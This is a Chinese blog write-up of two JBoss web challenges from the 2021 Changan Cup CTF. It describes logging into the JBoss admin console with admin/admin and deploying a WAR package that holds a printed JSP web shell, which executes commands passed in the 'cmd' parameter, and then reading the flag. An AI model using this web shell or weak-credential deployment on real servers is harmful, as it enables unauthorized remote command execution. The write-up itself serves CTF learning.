2021长安杯WEB题部分WP

31 篇文章 4 订阅
这篇博客分享了作者在2021长安杯比赛中遇到的两道JBOSS相关题目,尽管题目描述不同,但解决方法相同,都是通过利用弱口令进入后台,然后上传包含RCE漏洞的WAR包来实现。作者提供了一个生成WAR包的脚本,并详细描述了上传和执行命令的过程,最终成功获取flag。可能由于出题方的失误导致两题解题方式一致。
摘要由CSDN通过智能技术生成

2021长安杯WEB题部分WP

1.前言

​ 怎么说呢,这次的长安杯比赛的题目有些奇怪。当然这里指我怎么也看不懂的WEB第一题《soeasy》,还有我做的这两道JBOSS的题目。当我做出第一道JBOSS之后,我发现他只是一道很简单的RCE,但是不久平台又放出了第二道JBOSS题目。额。。。怎么说呢?虽然他的题目描述上有JBOSS很不甘心的字眼,但这两道题明明是同一个解题方式呀。

2.正文

在这里插入图片描述
在这里插入图片描述

题目的话就是上面的这两道,题目在这里就一起说了,因为解法都是一样的(X。
首先拿到题目,一个JBOSS的管理界面。

在这里插入图片描述
然后进入管理员控制台登陆界面。
在这里插入图片描述
这里的话就是一个弱口令,admin,admin没有什么好说的。直接就进到了后台管理界面。
在这里插入图片描述

在后台的管理界面看到了上传WAR包的地方,那么很明显这道题考察的就是Jboss 5.x/6.x admin-Console后台部署war包相关的知识。
那么先拿一个脚本生成WAR包。下面这个脚本来源于这位大佬

<%
    if("123".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a = -1;          
        byte[] b = new byte[1024];          
        out.print("<pre>");          
        while((a=in.read(b))!=-1){
            out.println(new String(b));          
        }
        out.print("</pre>");
    } 
%>

生成war包
在这里插入图片描述
然后上传
请添加图片描述
请添加图片描述
然后利用传参进行RCE
请添加图片描述
cat一下flag,拿到flag
请添加图片描述

3.后记

在文章的刚开始就说过了,两道题都可以通过同一个方式拿到flag,虽然不知道为什么,很有可能是出题方的失误。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值